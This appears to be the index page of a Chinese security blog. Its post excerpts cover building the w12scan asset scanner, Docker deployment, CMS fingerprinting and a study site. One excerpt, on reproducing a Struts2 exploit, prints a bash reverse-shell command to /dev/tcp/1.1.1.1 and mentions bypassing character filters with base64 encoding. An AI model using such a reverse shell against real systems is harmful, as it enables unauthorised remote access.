小草窝博客

2019-2-11阅读(1081)评论(0)

w11scan的时候dockerfile写得快要吐血了，本想着有了w11scan踩过的坑，w12scan应该简单才是，没想到更大的坑在等着我。 前置 前置大概浏览一遍 docker从入门到实践 https://www.hacking8.com/docker-practice/ w12scan需要多服务一起启动，有c...

2019-2-4阅读(1824)评论(1)

大年三十，一边看着春晚，一边修改细节，最后成品感觉挺不错的。web端完成了，对这个作品越来越期待了。今天想了下，觉得w12scan的架构有点复杂， 如果不是我自己的话，其他人部署可能会很困难，曾经我就是不喜欢这样困难的部署才造轮子的，所以，我觉得w12scan的部署至少应该也是一键化的，在Windows，mac，Linux上都是这样。 ...

2019-2-2阅读(813)评论(3)

为什么是1号，因为这是第一个演示视频，功能还没有完善，所以先录了一小段。后面也会有二号和三号视频 w12scan-2.mp4https://x.hacking8.com/content/uploadfile/201902/w12scan-preview.mp4

2019-1-6阅读(1265)评论(9)

这是今年计划的一部分，下一步计划根据知道创宇技能表的内容来作为网站目录的大纲。 这个网站主要是给自己无聊的时候看看，优先上线自己不会的内容。 周末两天完成了第一个初始版本，支持导入markdown格式书籍，没有用到数据库，都是根据json来的，新的书籍上线只需要修改一下json格式即可上线，简单方便~ 前端简单的用bootstrap修饰了一下，勉强能看...

2018-12-20阅读(1715)评论(0)

为w12scan的前端设计了四张草稿，然后用Django简单的跑了下，gif录制程序可能有点失真，在本机上效果不错的。里面的数据都是临时填充的垃圾数据，不是真实数据。接下来就是功能性的设计和数据库的设计了。 Django installation recordInstallneed python >= 3pip install django mysq...

2018-12-18阅读(1480)评论(0)

很久之前就有w12scan的想法，但是一直停留在那里，这次借毕业设计的机会，将它实现出来！~ Thinking原本设计出来是为了寻找SRC的资产等信息，后来觉得可以在扩大一下，保留SRC资产的收集功能，将范围扩大到全网。具体我想模仿zoomeye,fofa的全网检索功能，所以会将所有的域名IP信息进行深度的指纹识别入库，保留SRC的功能是指我可以随时指定扫...

2018-11-20阅读(3748)评论(0)

0x01在复现struts2遇到的问题，用命令执行反弹shell的时候总是失败，经过很久的测试，怀疑是"、<>等字符出现了问题。 0x02经过漫长的探索，和公开发布的poc中的payload，找到了绕过的方法，可以用类似base64编码的方式来绕过。比如bash -c 'sh -i >& /dev/tcp/1.1.1.1/666 ...

2018-11-18阅读(3041)评论(2)

改装博客因为一些数据的历史性，加上也不想在折腾其他博客了，本来想自己写个博客的，但那时因为之前自己域名在国外，速度很慢，想做成静态化减小资源压力。但现在博客以及在国内备案，用腾讯云学生主机还是绰绰有余，所以没有自己造轮子的必要了，主要是解决一下emlog长久不更新内心存在的”不安全感”。 原系统中好多功能可以更加优美，加上漏洞部分，所以我决定对博客系统...

2018-10-6阅读(1218)评论(0)

最近在写Aireye（全网网络资产收集系统），模仿zoomeye项目，但是指纹识别的时候如果用指纹库扫描，指纹越大，则效率会越慢。虽然在w11scan的项目中有通过正确率来拉取最高的指纹，但是依然没有解决该问题。 决策树通过各自决策来增加该CMS的权值，当权值大于某个值时，即可判断该CMS。这样就解决了指纹越大，而效率越慢的问题了。 如何进行决策呢？先统...

2018-9-29阅读(1638)评论(0)

在全网扫描时，对CMS指纹进行分析，想法是仅从首页或者一些地方就可以获取到，尽量不使用指纹库中庞大的路径扫描。 同时也统计排名Top使用的cms，数据为airbug项目提供参考。 查询语句: SELECT result,count(id) as total FROM `whatcms_result` group by re...